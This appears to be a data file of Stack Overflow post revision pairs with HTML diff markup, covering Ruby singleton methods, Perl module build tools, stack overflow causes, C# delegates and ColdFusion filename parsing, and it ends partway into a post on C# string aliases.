 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;Foo.method_defined? :method1&lt;span class="diff-delete"&gt; #=&amp;gt;&lt;/span&gt; true_x000D_
Foo.method_defined? :method2&lt;span class="diff-delete"&gt; #=&amp;gt;&lt;/span&gt; false_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;singleton_class = (class &amp;lt;&amp;lt; foo; self; end)_x000D_
other_singleton_class = (class &amp;lt;&amp;lt; other_foo; self; end)&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
&lt;span class="diff-delete"&gt;singleton_class.method_defined?&lt;/span&gt; :&lt;span class="diff-delete"&gt;method1 #=&amp;gt; true&lt;/span&gt;_x000D_
other_singleton_class.method_defined? :method1&lt;span class="diff-delete"&gt; #=&amp;gt;&lt;/span&gt; true_x000D_
&lt;span class="diff-delete"&gt;singleton_class.method_defined? &lt;/span&gt;:&lt;span class="diff-delete"&gt;method2 #=&amp;gt;&lt;/span&gt; &lt;span class="diff-delete"&gt;true_x000D_
&lt;/span&gt;other_singleton_class.method_defined? :method2&lt;span class="diff-delete"&gt; #=&amp;gt;&lt;/span&gt; false_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;class &amp;lt;&amp;lt; foo; def method3; puts 3; end; end_x000D_
foo.method3&lt;span class="diff-delete"&gt; #&amp;gt;&amp;gt; &lt;/span&gt;3_x000D_
Foo.method_defined? :method3&lt;span class="diff-delete"&gt; #=&amp;gt;&lt;/span&gt; false_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; methods must always belong to a class (or be instance methods of some class)&lt;/li&gt; _x000D_
  &lt;li&gt; normal methods belong to the class they're defined in (i.e. are instance methods of the class)&lt;/li&gt; _x000D_
  &lt;li&gt; class methods are just singleton methods of a &lt;code&gt;Class&lt;/code&gt;&lt;/li&gt; _x000D_
  &lt;li&gt; singleton methods of an object are not instance methods of the class of the object; rather, they are instance methods of the singleton class of the object.&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;irb(main):001:0&amp;gt; &lt;/span&gt;class Foo; def method1; puts 1; end; end_x000D_
&lt;span class="diff-add"&gt;=&amp;gt; nil_x000D_
irb(main):002:0&amp;gt; &lt;/span&gt;foo = Foo.new_x000D_
&lt;span class="diff-add"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="diff-add"&gt;#&amp;lt;Foo:0xb79fa724&amp;gt;&lt;/span&gt;_x000D_
&lt;span class="diff-add"&gt;irb(main):003:0&amp;gt; &lt;/span&gt;def foo.method2; puts 2; end_x000D_
&lt;span class="diff-add"&gt;=&amp;gt; nil&lt;/span&gt;_x000D_
&lt;span class="diff-add"&gt;irb(main):004:0&amp;gt; &lt;/span&gt;foo.method1&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;1&lt;span class="diff-add"&gt;_x000D_
=&amp;gt; nil&lt;/span&gt;_x000D_
&lt;span class="diff-add"&gt;irb(main):005:0&amp;gt; &lt;/span&gt;foo.method2&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;2_x000D_
&lt;span class="diff-add"&gt;=&amp;gt; nil_x000D_
irb(main):006:0&amp;gt; &lt;/span&gt;other_foo&lt;span class="diff-add"&gt; = Foo&lt;/span&gt;.&lt;span class="diff-add"&gt;new_x000D_
=&amp;gt;&lt;/span&gt; &lt;span class="diff-add"&gt;#&amp;lt;Foo:0xb79f0ef4&amp;gt;_x000D_
irb(main):007:0&amp;gt;&lt;/span&gt; &lt;span class="diff-add"&gt;other_foo.method1_x000D_
&lt;/span&gt;1&lt;span class="diff-add"&gt;_x000D_
=&amp;gt; nil&lt;/span&gt;_x000D_
&lt;span class="diff-add"&gt;irb(main):008:0&amp;gt; &lt;/span&gt;other_foo.method2&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;NoMethodError: undefined method `method2' for #&amp;lt;Foo:0xb79f0ef4&amp;gt;_x000D_
&lt;span class="diff-add"&gt;        from (irb):8_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;irb(main):009:0&amp;gt; &lt;/span&gt;Foo.method_defined? :method1&lt;span class="diff-add"&gt;_x000D_
=&amp;gt;&lt;/span&gt; true_x000D_
&lt;span class="diff-add"&gt;irb(main):010:0&amp;gt; &lt;/span&gt;Foo.method_defined? :method2&lt;span class="diff-add"&gt;_x000D_
=&amp;gt;&lt;/span&gt; false_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;irb(main):012:0&amp;gt; &lt;/span&gt;singleton_class = (&lt;span class="diff-add"&gt; &lt;/span&gt;class &amp;lt;&amp;lt; foo; self; end&lt;span class="diff-add"&gt; )_x000D_
=&amp;gt; #&amp;lt;Class:#&amp;lt;Foo:0xb79fa724&amp;gt;&amp;gt;_x000D_
irb(main):013:0&amp;gt; singleton_class.method_defined? :method1_x000D_
=&amp;gt; true_x000D_
irb(main&lt;/span&gt;)&lt;span class="diff-add"&gt;:014:0&amp;gt; singleton_class.method_defined? :method2_x000D_
=&amp;gt; true&lt;/span&gt;_x000D_
&lt;span class="diff-add"&gt;irb(main):015:0&amp;gt; &lt;/span&gt;other_singleton_class = (&lt;span class="diff-add"&gt; &lt;/span&gt;class &amp;lt;&amp;lt; other_foo; self; end&lt;span class="diff-add"&gt; &lt;/span&gt;)_x000D_
&lt;span class="diff-add"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="diff-add"&gt;#&amp;lt;Class&lt;/span&gt;:&lt;span class="diff-add"&gt;#&amp;lt;Foo:0xb79f0ef4&amp;gt;&amp;gt;&lt;/span&gt;_x000D_
&lt;span class="diff-add"&gt;irb(main):016:0&amp;gt; &lt;/span&gt;other_singleton_class.method_defined? :method1&lt;span class="diff-add"&gt;_x000D_
=&amp;gt;&lt;/span&gt; true_x000D_
&lt;span class="diff-add"&gt;irb(main)&lt;/span&gt;:&lt;span class="diff-add"&gt;017:0&amp;gt;&lt;/span&gt; other_singleton_class.method_defined? :method2&lt;span class="diff-add"&gt;_x000D_
=&amp;gt;&lt;/span&gt; false_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;irb(main):018:0&amp;gt; &lt;/span&gt;class &amp;lt;&amp;lt; foo; def method3; puts 3; end; end&lt;span class="diff-add"&gt;_x000D_
=&amp;gt; nil&lt;/span&gt;_x000D_
&lt;span class="diff-add"&gt;irb(main):019:0&amp;gt; &lt;/span&gt;foo.method3&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;3_x000D_
&lt;span class="diff-add"&gt;=&amp;gt; nil_x000D_
irb(main):022:0&amp;gt; &lt;/span&gt;Foo.method_defined? :method3&lt;span class="diff-add"&gt;_x000D_
=&amp;gt;&lt;/span&gt; false_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; methods must always belong to a class (or&lt;span class="diff-add"&gt;:&lt;/span&gt; be instance methods of some class)&lt;/li&gt; _x000D_
  &lt;li&gt; normal methods belong to the class they're defined in (i.e. are instance methods of the class)&lt;/li&gt; _x000D_
  &lt;li&gt; class methods are just singleton methods of a &lt;code&gt;Class&lt;/code&gt;&lt;/li&gt; _x000D_
  &lt;li&gt; singleton methods of an object are not instance methods of the class of the object; rather, they are instance methods of the singleton class of the object.&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Pistos</t>
  </si>
  <si>
    <t>sawa</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; For me, it's simple: I work 8 hours a day already. I spend a few more hours a day keeping current. I have a girlfriend, some local family and a decent circle of friends. I have (gasp) non-computer-related interests and hobbies. In other words, I have a life.&lt;/p&gt; _x000D_
 &lt;p&gt; So ... &lt;strong&gt;Time.&lt;/strong&gt; Time is not on my side. Would that it was ... My blog might be a bit more current if there were just two more hours in every day. :)&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; For me, it's simple: I work 8 hours a day already. I spend a few more hours a day keeping current. I have a girlfriend, some local family and a decent circle of friends. I have (gasp) non-computer-related interests and hobbies. In other words, I have a life.&lt;/p&gt; _x000D_
 &lt;p&gt; So ... &lt;strong&gt;Time.&lt;/strong&gt; Time is not on my side. Would that it was ... My blog might be a bit more current if there were just two more hours in every day. :)&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt;(Originally posted by &lt;/span&gt;&lt;a href="http://stackoverflow.com/users/14048/john-rudy"&gt;&lt;span class="diff-add"&gt;John Rudy&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-add"&gt;.)&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>John Rudy</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; EDIT:&lt;/span&gt; As&lt;span class="diff-delete"&gt; of 2015-Jul-10 the current ExtUtils::MakeMaker maintainers intend to continue maintaining it indefinitely, and&lt;/span&gt; the&lt;span class="diff-delete"&gt; current Module::Build maintainers really wish Module::Build would go away. Please do not use it unless necessary.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; As the [former]&lt;/span&gt; maintainer of ExtUtils::MakeMaker, I like to recommend Module::Build because MakeMaker is a horror show and I don't want to maintain it any more. Module::Build is so much better put together. But those aren't your concerns and I'll present my "least hassle for you" answer.&lt;/p&gt; _x000D_
 &lt;h2&gt;Executive Summary:&lt;/h2&gt; _x000D_
 &lt;p&gt; Because Module::Build support is not 100% in place through all of Perl, start with MakeMaker. If you want to do any customization at all, switch to Module::Build. Since their basic layout, options and interface are almost identical this will be painless. As seductive as it looks, avoid Module::Install.&lt;/p&gt; _x000D_
 &lt;p&gt; Fortunately, Module::Build can emulate MakeMaker which helps some, but doesn't help if you're going to do any customization. See &lt;a href="http://search.cpan.org/perldoc?Module::Build::Compat" rel="nofollow noreferrer"&gt;Module::Build::Compat&lt;/a&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; For CPAN releases using Module::Build is fine. There's enough Module::Build stuff on CPAN now that everyone's dealt with getting it bootstrapped already.&lt;/p&gt; _x000D_
 &lt;p&gt; Finally, the new &lt;a href="http://module-build.sourceforge.net/META-spec.html#configure_requires" rel="nofollow noreferrer"&gt;&lt;code&gt;configure_requires&lt;/code&gt;&lt;/a&gt; option lets CPAN shells know to install Module::Build before they can start building the module. Unfortunately only the latest CPAN shells know about configure_requires.&lt;/p&gt; _x000D_
 &lt;p&gt; Oh, whatever you do don't use h2xs (unless you're writing XS code... and even then think about it).&lt;/p&gt; _x000D_
 &lt;h2&gt;MakeMaker Pros:&lt;/h2&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; Comes with Perl.&lt;/li&gt; _x000D_
  &lt;li&gt; Everything knows what to do with a Makefile.PL.&lt;/li&gt; _x000D_
  &lt;li&gt; Most module authoring documentation will cover MakeMaker.&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;h2&gt;MakeMaker Cons:&lt;/h2&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; Requires make (think Windows)&lt;/li&gt; _x000D_
  &lt;li&gt; Difficult to customize&lt;/li&gt; _x000D_
  &lt;li&gt; Even harder to customize and make cross platform&lt;/li&gt; _x000D_
  &lt;li&gt; Difficult to debug when something goes wrong (unless you understand make)&lt;/li&gt; _x000D_
  &lt;li&gt; No new features are being added (except related to META.yml)&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;h2&gt;Module::Build Pros:&lt;/h2&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; Easier to customize&lt;/li&gt; _x000D_
  &lt;li&gt; Pure Perl&lt;/li&gt; _x000D_
  &lt;li&gt; Easier to debug (it's Perl)&lt;/li&gt; _x000D_
  &lt;li&gt; Can emulate MakeMaker in several ways&lt;/li&gt; _x000D_
  &lt;li&gt; The CPAN shell will install Module::Build for you&lt;/li&gt; _x000D_
  &lt;li&gt; New features are being added&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;h2&gt;Module::Build Cons:&lt;/h2&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; CPANPLUS (as of this writing) won't install Module::Build for you. Real Soon Now.&lt;/li&gt; _x000D_
  &lt;li&gt; Older versions of CPAN and CPANPLUS don't know anything about Module::Build.&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;h2&gt;Module::Install Pros:&lt;/h2&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; Slick interface&lt;/li&gt; _x000D_
  &lt;li&gt; Bundles itself, you have a known version&lt;/li&gt; _x000D_
  &lt;li&gt; Everything knows how to deal with a Makefile.PL&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;h2&gt;Module::Install Cons:&lt;/h2&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; Requires make&lt;/li&gt; _x000D_
  &lt;li&gt; Always uses bundled version, vulnerable to external breakage&lt;/li&gt; _x000D_
  &lt;li&gt; Difficult to customize outside its interface&lt;/li&gt; _x000D_
  &lt;li&gt; Mucks with the guts of MakeMaker so a new MakeMaker release will eventually break it.&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; As the maintainer of ExtUtils::MakeMaker, I like to recommend Module::Build because MakeMaker is a horror show and I don't want to maintain it any more. Module::Build is so much better put together. But those aren't your concerns and I'll present my "least hassle for you" answer.&lt;/p&gt; _x000D_
 &lt;h2&gt;Executive Summary:&lt;/h2&gt; _x000D_
 &lt;p&gt; Because Module::Build support is not 100% in place through all of Perl, start with MakeMaker. If you want to do any customization at all, switch to Module::Build. Since their basic layout, options and interface are almost identical this will be painless. As seductive as it looks, avoid Module::Install.&lt;/p&gt; _x000D_
 &lt;p&gt; Fortunately, Module::Build can emulate MakeMaker which helps some, but doesn't help if you're going to do any customization. See &lt;a href="http://search.cpan.org/perldoc?Module::Build::Compat" rel="nofollow noreferrer"&gt;Module::Build::Compat&lt;/a&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; For CPAN releases using Module::Build is fine. There's enough Module::Build stuff on CPAN now that everyone's dealt with getting it bootstrapped already.&lt;/p&gt; _x000D_
 &lt;p&gt; Finally, the new &lt;a href="http://module-build.sourceforge.net/META-spec.html#configure_requires" rel="nofollow noreferrer"&gt;&lt;code&gt;configure_requires&lt;/code&gt;&lt;/a&gt; option lets CPAN shells know to install Module::Build before they can start building the module. Unfortunately only the latest CPAN shells know about configure_requires.&lt;/p&gt; _x000D_
 &lt;p&gt; Oh, whatever you do don't use h2xs (unless you're writing XS code... and even then think about it).&lt;/p&gt; _x000D_
 &lt;h2&gt;MakeMaker Pros:&lt;/h2&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; Comes with Perl.&lt;/li&gt; _x000D_
  &lt;li&gt; Everything knows what to do with a Makefile.PL.&lt;/li&gt; _x000D_
  &lt;li&gt; Most module authoring documentation will cover MakeMaker.&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;h2&gt;MakeMaker Cons:&lt;/h2&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; Requires make (think Windows)&lt;/li&gt; _x000D_
  &lt;li&gt; Difficult to customize&lt;/li&gt; _x000D_
  &lt;li&gt; Even harder to customize and make cross platform&lt;/li&gt; _x000D_
  &lt;li&gt; Difficult to debug when something goes wrong (unless you understand make)&lt;/li&gt; _x000D_
  &lt;li&gt; No new features are being added (except related to META.yml)&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;h2&gt;Module::Build Pros:&lt;/h2&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; Easier to customize&lt;/li&gt; _x000D_
  &lt;li&gt; Pure Perl&lt;/li&gt; _x000D_
  &lt;li&gt; Easier to debug (it's Perl)&lt;/li&gt; _x000D_
  &lt;li&gt; Can emulate MakeMaker in several ways&lt;/li&gt; _x000D_
  &lt;li&gt; The CPAN shell will install Module::Build for you&lt;/li&gt; _x000D_
  &lt;li&gt; New features are being added&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;h2&gt;Module::Build Cons:&lt;/h2&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; CPANPLUS (as of this writing) won't install Module::Build for you. Real Soon Now.&lt;/li&gt; _x000D_
  &lt;li&gt; Older versions of CPAN and CPANPLUS don't know anything about Module::Build.&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;h2&gt;Module::Install Pros:&lt;/h2&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; Slick interface&lt;/li&gt; _x000D_
  &lt;li&gt; Bundles itself, you have a known version&lt;/li&gt; _x000D_
  &lt;li&gt; Everything knows how to deal with a Makefile.PL&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;h2&gt;Module::Install Cons:&lt;/h2&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; Requires make&lt;/li&gt; _x000D_
  &lt;li&gt; Always uses bundled version, vulnerable to external breakage&lt;/li&gt; _x000D_
  &lt;li&gt; Difficult to customize outside its interface&lt;/li&gt; _x000D_
  &lt;li&gt; Mucks with the guts of MakeMaker so a new MakeMaker release will eventually break it.&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Schwern</t>
  </si>
  <si>
    <t>Ether</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Parameters and local variables are allocated on the stack (with reference types the object lives on the heap and variable references that object). The stack typically lives at the upper end of your address space and as it is used up it heads towards the bottom of the address space (i.e. towards zero).&lt;/p&gt; _x000D_
 &lt;p&gt; Your process also has a heap, which lives at the bottom end of your process. As you allocate memory, this heap can grow towards the upper end of your address space. As you can see, there is a potential for the heap to "collide" with the stack (a bit like tectonic plates).&lt;/p&gt; _x000D_
 &lt;p&gt; The common cause for a stack overflow is a bad recursive call. Typically, this is caused when your recursive functions &lt;span class="diff-delete"&gt;don't&lt;/span&gt; have the correct termination condition, so it ends up calling itself forever. However, with GUI programming, it's possible to generate indirect recursion. For example, your app may be handling paint messages, and, whilst processing them, it may call a function that causes the system to send another paint message. Here you've not explicitly called yourself, but the OS/VM has done it for you.&lt;/p&gt; _x000D_
 &lt;p&gt; To deal with them you'll need to examine your code. If you've got functions that call themselves then check that you've got a terminating condition. If you have then check than when calling the function you have at least modified one of the arguments, otherwise&lt;span class="diff-delete"&gt;,&lt;/span&gt; there'll be no visible change for the recursively called function and the terminating condition is useless.&lt;/p&gt; _x000D_
 &lt;p&gt; If you've got no obvious recursive functions then check to see if you're calling any library functions that indirectly will cause your function to be called (like the implicit case above).&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Parameters and local variables are allocated on the stack (with reference types the object lives on the heap and&lt;span class="diff-add"&gt; a&lt;/span&gt; variable references that object). The stack typically lives at the upper end of your address space and as it is used up it heads towards the bottom of the address space (i.e. towards zero).&lt;/p&gt; _x000D_
 &lt;p&gt; Your process also has a heap, which lives at the bottom end of your process. As you allocate memory, this heap can grow towards the upper end of your address space. As you can see, there is a potential for the heap to "collide" with the stack (a bit like tectonic plates&lt;span class="diff-add"&gt;!!!&lt;/span&gt;).&lt;/p&gt; _x000D_
 &lt;p&gt; The common cause for a stack overflow is a bad recursive call. Typically, this is caused when your recursive functions &lt;span class="diff-add"&gt;doesn't&lt;/span&gt; have the correct termination condition, so it ends up calling itself forever. However, with GUI programming, it's possible to generate indirect recursion. For example, your app may be handling paint messages, and, whilst processing them, it may call a function that causes the system to send another paint message. Here you've not explicitly called yourself, but the OS/VM has done it for you.&lt;/p&gt; _x000D_
 &lt;p&gt; To deal with them you'll need to examine your code. If you've got functions that call themselves then check that you've got a terminating condition. If you have then check than when calling the function you have at least modified one of the arguments, otherwise there'll be no visible change for the recursively called function and the terminating condition is useless.&lt;/p&gt; _x000D_
 &lt;p&gt; If you've got no obvious recursive functions then check to see if you're calling any library functions that indirectly will cause your function to be called (like the implicit case above).&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Sean</t>
  </si>
  <si>
    <t>kres0345</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;Predicate&amp;lt;T&amp;gt;&lt;/span&gt;&lt;/code&gt; is a &lt;code&gt;&lt;span class="diff-delete"&gt;delegate&lt;/span&gt;&lt;/code&gt; type. You can never derive from &lt;code&gt;&lt;span class="diff-delete"&gt;delegates&lt;/span&gt;&lt;/code&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; To be honest, it doesn't sound like inheritance is really appropriate here anyway - just write a method which returns an inverse of the original. It's as simple as this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;public static Predicate&amp;lt;T&amp;gt; Invert&amp;lt;T&amp;gt;(Predicate&amp;lt;T&amp;gt; original)_x000D_
{_x000D_
    return t =&amp;gt; !original(t);_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Predicate&amp;lt;T&amp;gt;&lt;/span&gt; is a &lt;span class="diff-add"&gt;delegate&lt;/span&gt; type. You can never derive from &lt;span class="diff-add"&gt;delegates&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; To be honest, it doesn't sound like inheritance is really appropriate here anyway - just write a method which returns an inverse of the original. It's as simple as this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;public static Predicate&amp;lt;T&amp;gt; Invert&amp;lt;T&amp;gt;(Predicate&amp;lt;T&amp;gt; original)_x000D_
{_x000D_
    return t =&amp;gt; !original(t);_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Jon Skeet</t>
  </si>
  <si>
    <t>akjoshi</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Use the List functions to your advantage.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;cfset FileName = ListDeleteAt(FileFullName, ListLen(FileFullName, "."), ".")&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Be aware that this only works for file names that actually &lt;em&gt;have&lt;/em&gt; a file extension (that is defined as the thing after the last dot). To make it safer, the following is better:&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; nIn&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;cfset Extensionedex = ListLen(FileFullName, ".")&amp;gt;_x000D_
&amp;lt;cfif Extensionedex gt 1&amp;gt;_x000D_
  &amp;lt;cfset FileExt  = ListGetAt(Extensionedex , ".")&amp;gt;_x000D_
  &amp;lt;cfset FileName = ListDeleteAt(FileFullName, Extensionedex, ".")&amp;gt;_x000D_
&amp;lt;cfelse&amp;gt;_x000D_
  &amp;lt;cfset FileExt  = ""&amp;gt;_x000D_
  &amp;lt;cfset FileName = FileFullName&amp;gt;_x000D_
&amp;lt;/cfif&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; To complicate things a bit further: There may be files that start with a dot. There may be file names that contain many adjacent dots. List functions return wrong results for them, as they ignore empty list elements. There may also be files that have dots, but no extension. These can only be handled if you provide an extension white list: &lt;code&gt;ListFindNoCase(FileExt, "doc,xls,ppt,jpg")&lt;/code&gt;. If you want to account for all of this, you probably need to resign to a reguar expression:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;cfset FileExtRe = "(?:\.(?:doc|xls|ppt|jpg))?$"&amp;gt;_x000D_
&amp;lt;cfset FileName  = REReplaceNoCase(FileExtRe, FileFullName, "")&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; To split file name from path, ColdFusion provides distinct functions that also handle platform differences: &lt;code&gt;GetFileFromPath()&lt;/code&gt; and &lt;code&gt;GetDirectoryFromPath()&lt;/code&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Use the List functions to your advantage.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;cfset FileName = ListDeleteAt(FileFullName, ListLen(FileFullName, "."), ".")&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Be aware that this only works for file names that actually &lt;em&gt;have&lt;/em&gt; a file extension (that is defined as the thing after the last dot). To make it safer, the following is better:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;ne_x000D_
nin_x000D_
xIn_x000D_
SomeIndex_x000D_
SomenIndex_x000D_
SomexIndex_x000D_
_x000D_
_x000D_
&lt;/span&gt;&amp;lt;cfset Extensionedex = ListLen(FileFullName, ".")&amp;gt;_x000D_
&amp;lt;cfif Extensionedex gt 1&amp;gt;_x000D_
  &amp;lt;cfset FileExt  = ListGetAt(Extensionedex , ".")&amp;gt;_x000D_
  &amp;lt;cfset FileName = ListDeleteAt(FileFullName, Extensionedex, ".")&amp;gt;_x000D_
&amp;lt;cfelse&amp;gt;_x000D_
  &amp;lt;cfset FileExt  = ""&amp;gt;_x000D_
  &amp;lt;cfset FileName = FileFullName&amp;gt;_x000D_
&amp;lt;/cfif&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; To complicate things a bit further: There may be files that start with a dot. There may be file names that contain many adjacent dots. List functions return wrong results for them, as they ignore empty list elements. There may also be files that have dots, but no extension. These can only be handled if you provide an extension white list: &lt;code&gt;ListFindNoCase(FileExt, "doc,xls,ppt,jpg")&lt;/code&gt;. If you want to account for all of this, you probably need to resign to a reguar expression:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;cfset FileExtRe = "(?:\.(?:doc|xls|ppt|jpg))?$"&amp;gt;_x000D_
&amp;lt;cfset FileName  = REReplaceNoCase(FileExtRe, FileFullName, "")&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; To split file name from path, ColdFusion provides distinct functions that also handle platform differences: &lt;code&gt;GetFileFromPath()&lt;/code&gt; and &lt;code&gt;GetDirectoryFromPath()&lt;/code&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Just for the sake of completeness, here's a brain dump of related information.&lt;/p&gt; _x000D_
 &lt;p&gt; As others have noted, &lt;code&gt;string&lt;/code&gt; is an alias for &lt;code&gt;System.String&lt;/code&gt;. They compile to the same code, so at execution time there is no difference whatsoever. This is just one of the aliases in C#. The complete list is:&lt;/p&gt; _x000D_
